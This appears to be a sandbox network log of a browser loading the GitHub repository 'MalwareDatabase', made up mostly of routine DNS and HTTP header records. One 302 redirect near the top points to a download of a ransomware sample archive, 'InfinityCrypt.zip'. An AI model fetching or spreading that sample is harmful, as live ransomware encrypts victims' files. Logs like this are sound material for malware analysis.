cookie: tz=UTC
ResponseHTTP/2.0 302
date: Thu, 30 Jan 2025 22:04:11 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/refs/heads/master/ransomwares/InfinityCrypt.zip
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: D4B6:391246:13470E:1874CF:679BF759
-
Remote address:8.8.8.8:53Requestavatars.githubusercontent.comIN AResponseavatars.githubusercontent.comIN A185.199.109.133avatars.githubusercontent.comIN A185.199.108.133avatars.githubusercontent.comIN A185.199.111.133avatars.githubusercontent.comIN A185.199.110.133
-
Remote address:8.8.8.8:53Requestgithub.githubassets.comIN AResponsegithub.githubassets.comIN A185.199.109.154github.githubassets.comIN A185.199.111.154github.githubassets.comIN A185.199.110.154github.githubassets.comIN A185.199.108.154
-
Remote address:8.8.8.8:53Requestgithub.githubassets.comIN AResponsegithub.githubassets.comIN A185.199.108.154github.githubassets.comIN A185.199.110.154github.githubassets.comIN A185.199.111.154github.githubassets.comIN A185.199.109.154
-
Remote address:185.199.109.133:443RequestGET /u/44542704?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'
content-type: image/png
etag: "9a2efe452d138368bb47150077cf3966a0e8a699137cd76496cedb32fa6eabb0"
last-modified: Fri, 14 Feb 2020 15:58:52 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 2614:304668:DA8F2:123E19:677D3258
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600099-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1738274632.448084,VS0,VE1
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: bd47edd01e54d89cff9840f0b2f8275a0a2fc342
expires: Thu, 30 Jan 2025 22:08:52 GMT
source-age: 2016494
vary: Authorization,Accept-Encoding
content-length: 3043
-
Remote address:185.199.109.133:443RequestGET /u/51242428?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'
content-type: image/jpeg
etag: "bcbeb95c3f21364aef292d9e6c261374e079265660dda6145e13de8a5be8546f"
last-modified: Tue, 19 May 2020 23:35:43 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 1A01:2D774:101F9:1508A:6790C181
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600099-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1738274632.449300,VS0,VE2
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 58765c8d1aff9c16e7df9bd40ca8dd998cf9be1f
expires: Thu, 30 Jan 2025 22:08:52 GMT
source-age: 734663
vary: Authorization,Accept-Encoding
content-length: 1590
-
Remote address:185.199.109.133:443RequestGET /u/39349444?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'
content-type: image/png
etag: "e25efc2f3c542a995df70f85198b7fd6184be4700ec9756e00c0a8fd9e7a124c"
last-modified: Tue, 13 Jan 2015 09:12:58 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 1DED:45833:277382:341B9A:678220CA
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600099-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1738274632.449723,VS0,VE1
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 7e849ba1f7ba13f1a177310823cefcc9c44994ff
expires: Thu, 30 Jan 2025 22:08:52 GMT
source-age: 1693310
vary: Authorization,Accept-Encoding
content-length: 1505
-
Remote address:185.199.109.133:443RequestGET /u/17717494?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'
content-type: image/png
etag: "bbd78d1ccf4743a85b2c5003d9d579945b57235f0c8533ffd5c94ea947c970c8"
last-modified: Sun, 19 Mar 2023 14:46:52 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: EF2A:D967D:10C012:173BF5:6790AA66
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600099-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1738274632.449691,VS0,VE2
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 26eace0e15dfb03408757c1227bea57c82a20d51
expires: Thu, 30 Jan 2025 22:08:52 GMT
source-age: 740577
vary: Authorization,Accept-Encoding
content-length: 2493
-
Remote address:185.199.109.133:443RequestGET /u/63458929?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'
content-type: image/png
etag: "7a5751dd3780350bcf03cdf472fce0c8286cf0c843fede517d47c2031c586909"
last-modified: Sun, 20 Oct 2024 19:29:56 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 54EB:33D69D:E6E64:130335:677D3259
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600099-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1738274632.449682,VS0,VE2
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 8d1a26ccc29fcccd53f264b1eceecdbebb3a0d00
expires: Thu, 30 Jan 2025 22:08:52 GMT
source-age: 2016494
vary: Authorization,Accept-Encoding
content-length: 3731
-
GEThttps://private-user-images.githubusercontent.com/44542704/353824714-9af0a0be-eda5-4826-a3b6-e3ab436cd974.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzgyNzQ5MzEsIm5iZiI6MTczODI3NDYzMSwicGF0aCI6Ii80NDU0MjcwNC8zNTM4MjQ3MTQtOWFmMGEwYmUtZWRhNS00ODI2LWEzYjYtZTNhYjQzNmNkOTc0LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTAxMzAlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwMTMwVDIyMDM1MVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTk1ZTYxNjQ5ZWMwODNlYzEyMmU1MWE0OTRkM2NjYzE1ZTQxNDUyZDIxMTVlMjU0OGJjZDgwNWJlZDQxYmUyY2MmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.cdHPkUb6SOY4ufUj4BAvZLDndHvfnwMjojWvAPs--zomsedge.exeRemote address:185.199.109.133:443RequestGET /44542704/353824714-9af0a0be-eda5-4826-a3b6-e3ab436cd974.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzgyNzQ5MzEsIm5iZiI6MTczODI3NDYzMSwicGF0aCI6Ii80NDU0MjcwNC8zNTM4MjQ3MTQtOWFmMGEwYmUtZWRhNS00ODI2LWEzYjYtZTNhYjQzNmNkOTc0LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTAxMzAlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwMTMwVDIyMDM1MVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTk1ZTYxNjQ5ZWMwODNlYzEyMmU1MWE0OTRkM2NjYzE1ZTQxNDUyZDIxMTVlMjU0OGJjZDgwNWJlZDQxYmUyY2MmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.cdHPkUb6SOY4ufUj4BAvZLDndHvfnwMjojWvAPs--zo HTTP/2.0
host: private-user-images.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
last-modified: Wed, 31 Jul 2024 12:12:48 GMT
etag: "99f7b59bb69d6870454d0e3b02b058fc"
cache-control: max-age=2592000
x-amz-version-id: null
content-type: image/png
accept-ranges: bytes
age: 825013
date: Thu, 30 Jan 2025 22:03:52 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600099-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1738274632.452821,VS0,VE2
content-security-policy: default-src 'none'; script-src 'none'; img-src 'self'; media-src 'self'; sandbox;
x-fastly-request-id: 3dd27e7121a1548c606d7896d78afe4181a256fa
server: GitHub.Cloud
strict-transport-security: max-age=31536000; includeSubDomains
x-content-type-options: nosniff
timing-allow-origin: https://github.com
content-length: 109112
-
Remote address:185.199.109.133:443RequestGET /u/44542704?v=4&size=40 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'
content-type: image/png
etag: "d49ce3184891e8e0e902596e2f95df08a2f1c8418a4a1f671c1685f3ed3398cb"
last-modified: Fri, 14 Feb 2020 15:58:52 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 4E55:13F128:BB6EE:102AF9:67863FD2
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:53 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600099-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1738274634.745002,VS0,VE2
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 251c0d0731faa76dc41f3c3d42e18d2b5b1a3bab
expires: Thu, 30 Jan 2025 22:08:53 GMT
source-age: 1423222
vary: Authorization,Accept-Encoding
content-length: 1883
-
Remote address:8.8.8.8:53Requestgithub-cloud.s3.amazonaws.comIN AResponsegithub-cloud.s3.amazonaws.comIN CNAMEs3-1-w.amazonaws.coms3-1-w.amazonaws.comIN CNAMEs3-w.us-east-1.amazonaws.coms3-w.us-east-1.amazonaws.comIN A3.5.25.214s3-w.us-east-1.amazonaws.comIN A54.231.228.57s3-w.us-east-1.amazonaws.comIN A52.216.212.17s3-w.us-east-1.amazonaws.comIN A54.231.166.65s3-w.us-east-1.amazonaws.comIN A52.216.177.107s3-w.us-east-1.amazonaws.comIN A52.217.161.81s3-w.us-east-1.amazonaws.comIN A3.5.12.205s3-w.us-east-1.amazonaws.comIN A16.15.185.42
-
Remote address:185.199.109.154:443RequestGET /assets/light-7aa84bb7e11e.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Mon, 26 Aug 2024 16:36:17 GMT
etag: "0x8DCC5ED35736954"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 2015826
x-served-by: cache-iad-kjyo7100115-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 44, 762
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 363b56d5923f55b4224aac52889f3c64c5b2dd03
content-length: 479
-
Remote address:185.199.109.154:443RequestGET /assets/dark-f65db3e8d171.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Tue, 28 Jan 2025 22:01:39 GMT
etag: "0x8DD3FE7575532C5"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 89746
x-served-by: cache-iad-kcgs7200124-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 39, 1902
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 02000a98f218852e314d557609c3090e968f183f
content-length: 21307
-
Remote address:185.199.109.154:443RequestGET /assets/primer-primitives-d9abecd14f1e.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Fri, 20 Dec 2024 22:10:04 GMT
etag: "0x8DD21430E2A5E74"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1399771
x-served-by: cache-iad-kcgs7200067-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 19, 1161
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 74be1286a2085cde9414a628d886eb3f300f22db
content-length: 7898
-
Remote address:185.199.109.154:443RequestGET /assets/primer-93aded0ee8a1.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Thu, 19 Dec 2024 13:51:50 GMT
etag: "0x8DD203449ADEFDF"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1399767
x-served-by: cache-iad-kjyo7100075-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 13, 1158
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 35ce126827fe49df5992680dc1889aa761d5a65e
content-length: 7985
-
Remote address:185.199.109.154:443RequestGET /assets/global-d579f4a5b443.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Tue, 14 Jan 2025 14:54:01 GMT
etag: "0x8DD34AB487C4930"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1399770
x-served-by: cache-iad-kcgs7200108-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 9505, 1155
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 0d7006d1aae5679997fae5c0b70f5ea85e1e689b
content-length: 2608
-
Remote address:185.199.109.154:443RequestGET /assets/github-8049f990d299.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Wed, 15 Jan 2025 23:39:42 GMT
etag: "0x8DD35BDE28E1C20"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1207986
x-served-by: cache-iad-kiad7000067-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 27, 1188
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d88947c95828df77027a8aeff2f07a10a8a1fdfc
content-length: 39273
-
Remote address:185.199.109.154:443RequestGET /assets/repository-4fce88777fa8.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Wed, 15 Jan 2025 20:57:17 GMT
etag: "0x8DD35A73225FB56"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 796196
x-served-by: cache-iad-kiad7000054-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 22, 560
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 45ad2a0eb39923b9b41aa0b357105cd57adc9af7
content-length: 341
-
GEThttps://github.githubassets.com/assets/repos-overview.32a87dc4587d56dcf1eb.module.cssmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/repos-overview.32a87dc4587d56dcf1eb.module.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Tue, 21 Jan 2025 15:44:16 GMT
etag: "0x8DD3A32768821EB"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 796202
x-served-by: cache-iad-kcgs7200161-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 6, 1234
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1691f46b777b4ef44a58dffa636ce2977d33aebc
